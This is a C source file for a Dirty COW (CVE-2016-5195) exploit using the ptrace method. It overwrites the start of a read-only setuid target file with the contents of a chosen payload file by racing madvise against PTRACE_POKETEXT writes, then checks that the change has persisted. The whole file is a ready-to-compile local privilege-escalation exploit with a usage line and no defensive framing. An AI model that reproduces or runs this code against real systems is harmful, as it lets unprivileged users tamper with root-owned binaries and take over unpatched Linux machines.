// dcw.c - Dirty COW (CVE-2016-5195) writer (timwr ptrace method).
// Overwrites the start of a setuid target file with a payload file's contents.
// usage: ./dcw <target> <payloadfile>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>

pid_t pid;
volatile int stop = 0;
int f; void *map; struct stat st;
char *payload; off_t plen;
const char *target;

void *madviseThread(void *arg) { while (!stop) madvise(map, plen, MADV_DONTNEED); return NULL; }

static int ptrace_memcpy(pid_t cpid, void *dest, const void *src, size_t n) {
    const unsigned char *s = src; unsigned char *d = dest; unsigned long value;
    while (n >= sizeof(long)) {
        if (*((long*)s) != *((long*)d)) {
            memcpy(&value, s, sizeof(value));
            if (ptrace(PTRACE_POKETEXT, cpid, d, value) == -1) return -1;
        }
        n -= sizeof(long); d += sizeof(long); s += sizeof(long);
    }
    return 0;
}

static int verify(void) {
    int fd = open(target, O_RDONLY);
    if (fd == -1) return 0;
    char *b = malloc(plen); ssize_t r = read(fd, b, plen); close(fd);
    int ok = (r == plen && memcmp(b, payload, plen) == 0); free(b); return ok;
}

int main(int argc, char *argv[]) {
    if (argc < 3) { fprintf(stderr, "usage: %s <target> <payloadfile>\n", argv[0]); return 1; }
    target = argv[1];
    FILE *fp = fopen(argv[2], "rb");
    if (!fp) { perror("fopen"); return 1; }
    fseek(fp, 0, SEEK_END); plen = ftell(fp); rewind(fp);
    payload = malloc(plen);
    if (fread(payload, 1, plen, fp) != (size_t)plen) { perror("fread"); return 1; }
    fclose(fp);
    printf("payload %d bytes\n", (int)plen);
    f = open(target, O_RDONLY);
    if (f < 0) { perror("open"); return 1; }
    fstat(f, &st);
    map = mmap(NULL, plen, PROT_READ, MAP_PRIVATE, f, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 1; }
    printf("mmap %p\n", map);
    pid = fork();
    if (pid) {
        waitpid(pid, NULL, 0);
        int i, ok = 0;
        for (i = 0; i < 5000; i++) {
            ptrace_memcpy(pid, map, payload, plen);
            if (verify()) { ok = 1; printf("persisted after %d rounds\n", i); break; }
            usleep(5000);
        }
        printf("verify: %d\n", ok);
    } else {
        pthread_t mt;
        pthread_create(&mt, NULL, madviseThread, NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        stop = 1;
        pthread_join(mt, NULL);
    }
    printf("done\n");
    return 0;
}
